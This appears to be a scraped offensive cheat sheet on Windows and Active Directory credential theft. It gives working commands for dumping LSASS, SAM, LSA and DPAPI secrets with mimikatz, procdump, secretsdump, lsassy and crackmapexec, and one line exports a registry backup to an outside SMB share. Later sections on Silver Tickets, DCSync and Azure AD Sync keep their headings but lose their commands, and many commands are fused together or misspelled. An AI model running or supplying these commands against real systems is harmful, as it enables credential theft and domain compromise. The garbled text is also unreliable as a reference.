Administrator account
Extract credentials from LSASS
procdump.exe --acepteula -ma lsass.exe lsass.dmpmimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"load kiwi
creds_allcme smb <ip-range> -u <user> -p <password> -M lsassylsassy -d <domain> -u <user> -p <password> <ip>Extract Credentials from SAM
secretsdump.py <domain>/<user>:<password>@<ip>cme smb <ip-range> -u <user> -p <password> --samhashdumpreg save HKLM\SAM <file>;
reg save HKLM\SECURITY <file>;
reg save HKLM\SYSTEN <file>;
secretsdump.py -sam SAM -system SYSTEM LOCALmimikatz "privilege::debug" "lsadump::sam" "exit"Shadow copies
diskshadow list shadows allmklink /d c:\shadowcopy\\?\GLOBALROOT\Device\Harddisk VolumeShadowCopy\Extract Credentials from LSA
cme smb <ip-range> -u <user> -p <password> --lsasecretsdump.py <domain>/<user>:<password>@<ip>secretsdump.py -security <security-file> -system <system-file> LOCALreg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb-ip>\share'Extract dpapi
DonPAPI.py <domain>/<user>:<password>@<target>mimikatz.exe "sekurlsa::dpapi"secretsdump.py <domain>/<user>:<password>@<ip>Extract kerberos tickets
sekurlsa::ticketsSilver Tickets
Prerequisites
SPN password hash
Domain SID
Target SPN
Silver Ticket Forgery
NTLM Hash
We have to load mimikatz and extract the NTLM hash:
Domain SID
Then to obtain the SID use whoami:
Ticket Forging
With that information we can forge the ticket:
Using the ticket
DCSync
NTLM Hash of one user
Dump all hashes
Search Password Files
Search Stored Password
Chrome
Token Manipulation
Account Operators Group Membership
Add User
Import PowerView
Add DCSync Rights
DCSync
Azure Admin Group Membership
If an user is Admin of Azure Group we can try to exploit Azure AD Sync to grab the administrator password:
Then run this command being inside the path C:\Program Files\Microsoft Azure AD Sync\Bin :
Last updated